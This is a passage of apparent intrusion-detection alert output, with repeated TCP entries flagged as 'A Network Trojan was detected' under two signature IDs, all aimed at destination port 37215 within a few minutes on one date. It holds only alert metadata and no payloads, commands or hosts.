            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661944
            SID:2835222
            Source Port:34932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459748
            SID:2835222
            Source Port:36396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291213
            SID:2829579
            Source Port:48192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.397424
            SID:2829579
            Source Port:56774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.566035
            SID:2835222
            Source Port:41040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.469781
            SID:2835222
            Source Port:59548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326904
            SID:2829579
            Source Port:48140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575797
            SID:2835222
            Source Port:56382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772763
            SID:2835222
            Source Port:43986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.485600
            SID:2829579
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883696
            SID:2829579
            Source Port:43620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.384799
            SID:2829579
            Source Port:51424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996128
            SID:2835222
            Source Port:40058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014451
            SID:2829579
            Source Port:59568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782542
            SID:2829579
            Source Port:42164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979650
            SID:2835222
            Source Port:54484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230938
            SID:2829579
            Source Port:45330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371492
            SID:2829579
            Source Port:47266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046077
            SID:2829579
            Source Port:60650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375150
            SID:2829579
            Source Port:32916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039677
            SID:2829579
            Source Port:41700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714475
            SID:2829579
            Source Port:54248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.905199
            SID:2835222
            Source Port:47848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984696
            SID:2829579
            Source Port:38354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473308
            SID:2835222
            Source Port:35796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446369
            SID:2835222
            Source Port:47360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067126
            SID:2829579
            Source Port:39400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604994
            SID:2835222
            Source Port:34578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537175
            SID:2829579
            Source Port:42416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.726544
            SID:2829579
            Source Port:51464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818680
            SID:2835222
            Source Port:33296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.250985
            SID:2829579
            Source Port:42626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881211
            SID:2835222
            Source Port:36104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543989
            SID:2829579
            Source Port:52388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998437
            SID:2835222
            Source Port:56852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400158
            SID:2835222
            Source Port:33030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919554
            SID:2835222
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.617001
            SID:2835222
            Source Port:54214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707037
            SID:2835222
            Source Port:59736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909850
            SID:2829579
            Source Port:51160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945907
            SID:2829579
            Source Port:58664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.812032
            SID:2835222
            Source Port:39056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994335
            SID:2835222
            Source Port:57054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.159095
            SID:2829579
            Source Port:44050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.108191
            SID:2835222
            Source Port:38258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550391
            SID:2835222
            Source Port:50422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698186
            SID:2829579
            Source Port:36982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850569
            SID:2835222
            Source Port:60064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738625
            SID:2829579
            Source Port:34212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985373
            SID:2829579
            Source Port:53544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019069
            SID:2829579
            Source Port:36584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953847
            SID:2829579
            Source Port:48766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.939051
            SID:2829579
            Source Port:36490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716910
            SID:2829579
            Source Port:49418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861973
            SID:2829579
            Source Port:51462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825661
            SID:2829579
            Source Port:57544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733863
            SID:2835222
            Source Port:34976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776230
            SID:2835222
            Source Port:49826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734977
            SID:2829579
            Source Port:50042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818708
            SID:2835222
            Source Port:43660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880166
            SID:2829579
            Source Port:40978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738302
            SID:2829579
            Source Port:33914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767419
            SID:2835222
            Source Port:40776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299028
            SID:2835222
            Source Port:49462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969342
            SID:2829579
            Source Port:57284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648532
            SID:2835222
            Source Port:41418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995312
            SID:2835222
            Source Port:52578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.409799
            SID:2829579
            Source Port:49526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777733
            SID:2835222
            Source Port:49690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.926978
            SID:2835222
            Source Port:47378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.641096
            SID:2829579
            Source Port:49498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.339958
            SID:2835222
            Source Port:33934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771121
            SID:2829579
            Source Port:56070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697866
            SID:2835222
            Source Port:60340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.508187
            SID:2835222
            Source Port:49694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.246036
            SID:2829579
            Source Port:55378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746265
            SID:2829579
            Source Port:46538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386766
            SID:2835222
            Source Port:44794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261539
            SID:2835222
            Source Port:52546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473289
            SID:2829579
            Source Port:52622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831639
            SID:2835222
            Source Port:41458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.722092
            SID:2835222
            Source Port:42862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728810
            SID:2829579
            Source Port:36106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280810
            SID:2835222
            Source Port:41598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447048
            SID:2835222
            Source Port:49580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669938
            SID:2835222
            Source Port:40098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.661558
            SID:2835222
            Source Port:44386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857683
            SID:2829579
            Source Port:48582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954129
            SID:2835222
            Source Port:54412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861234
            SID:2829579
            Source Port:39804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414254
            SID:2829579
            Source Port:44098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646343
            SID:2835222
            Source Port:48958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056844
            SID:2835222
            Source Port:47594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065234
            SID:2829579
            Source Port:60618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901300
            SID:2829579
            Source Port:34224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810786
            SID:2835222
            Source Port:54370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061539
            SID:2835222
            Source Port:59410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.289620
            SID:2829579
            Source Port:42344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873416
            SID:2829579
            Source Port:51370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771869
            SID:2835222
            Source Port:38490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854882
            SID:2829579
            Source Port:57788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766257
            SID:2829579
            Source Port:42780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744294
            SID:2829579
            Source Port:34692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.960396
            SID:2829579
            Source Port:39318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605538
            SID:2835222
            Source Port:41476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623022
            SID:2829579
            Source Port:41066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919381
            SID:2829579
            Source Port:56614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040270
            SID:2829579
            Source Port:45994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278131
            SID:2829579
            Source Port:50802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.528119
            SID:2829579
            Source Port:60466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777348
            SID:2829579
            Source Port:60392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071600
            SID:2835222
            Source Port:33750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861682
            SID:2835222
            Source Port:60132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451494
            SID:2829579
            Source Port:54292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905872
            SID:2835222
            Source Port:35502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946808
            SID:2829579
            Source Port:57636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.763377
            SID:2829579
            Source Port:60274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034873
            SID:2829579
            Source Port:34808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.063842
            SID:2829579
            Source Port:51032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047873
            SID:2835222
            Source Port:50642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371463
            SID:2835222
            Source Port:55772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541206
            SID:2829579
            Source Port:37594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856369
            SID:2829579
            Source Port:34434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012151
            SID:2829579
            Source Port:34314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766426
            SID:2829579
            Source Port:47758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371521
            SID:2835222
            Source Port:34642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834349
            SID:2835222
            Source Port:39978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052854
            SID:2835222
            Source Port:52236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.776990
            SID:2835222
            Source Port:48970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833761
            SID:2829579
            Source Port:55762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941738
            SID:2829579
            Source Port:50772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061565
            SID:2835222
            Source Port:50306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753275
            SID:2829579
            Source Port:49018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908450
            SID:2835222
            Source Port:38072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.084410
            SID:2835222
            Source Port:50736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473332
            SID:2835222
            Source Port:44780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873498
            SID:2835222
            Source Port:48070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534020
            SID:2829579
            Source Port:43670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721833
            SID:2829579
            Source Port:49328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078367
            SID:2835222
            Source Port:48636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716144
            SID:2829579
            Source Port:37752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863849
            SID:2835222
            Source Port:53944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067811
            SID:2829579
            Source Port:52310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.576105
            SID:2835222
            Source Port:40568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814609
            SID:2835222
            Source Port:47590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872651
            SID:2835222
            Source Port:47758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764838
            SID:2835222
            Source Port:36308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348784
            SID:2835222
            Source Port:59054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707746
            SID:2835222
            Source Port:46772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280752
            SID:2829579
            Source Port:48452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.725817
            SID:2829579
            Source Port:40366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735578
            SID:2829579
            Source Port:35426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597178
            SID:2835222
            Source Port:42906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765350
            SID:2835222
            Source Port:47518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770743
            SID:2829579
            Source Port:60936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837077
            SID:2829579
            Source Port:33262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867876
            SID:2829579
            Source Port:41920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.024987
            SID:2835222
            Source Port:50972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051465
            SID:2829579
            Source Port:44904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052613
            SID:2835222
            Source Port:33018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911301
            SID:2829579
            Source Port:47338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052764
            SID:2829579
            Source Port:42900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506721
            SID:2835222
            Source Port:47222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717177
            SID:2829579
            Source Port:47622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968457
            SID:2835222
            Source Port:46054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320738
            SID:2829579
            Source Port:41142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999510
            SID:2835222
            Source Port:59906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770661
            SID:2835222
            Source Port:38276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047766
            SID:2829579
            Source Port:40312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019243
            SID:2835222
            Source Port:46780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739451
            SID:2835222
            Source Port:48570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065500
            SID:2835222
            Source Port:56990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569423
            SID:2829579
            Source Port:44696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371273
            SID:2829579
            Source Port:59966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310746
            SID:2829579
            Source Port:48250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928970
            SID:2829579
            Source Port:56438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736073
            SID:2835222
            Source Port:44088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996394
            SID:2835222
            Source Port:42200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321815
            SID:2835222
            Source Port:47310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764855
            SID:2829579
            Source Port:48752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280373
            SID:2829579
            Source Port:51634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901575
            SID:2835222
            Source Port:44310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.846377
            SID:2829579
            Source Port:43502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741442
            SID:2829579
            Source Port:51990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850496
            SID:2829579
            Source Port:54276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745690
            SID:2829579
            Source Port:52634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048048
            SID:2835222
            Source Port:51138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368384
            SID:2829579
            Source Port:58796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926975
            SID:2829579
            Source Port:54190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861409
            SID:2829579
            Source Port:36548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922203
            SID:2829579
            Source Port:40788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967832
            SID:2835222
            Source Port:35854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261307
            SID:2829579
            Source Port:33966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344957
            SID:2835222
            Source Port:43862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811471
            SID:2835222
            Source Port:55640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934894
            SID:2829579
            Source Port:53066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967096
            SID:2829579
            Source Port:46722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
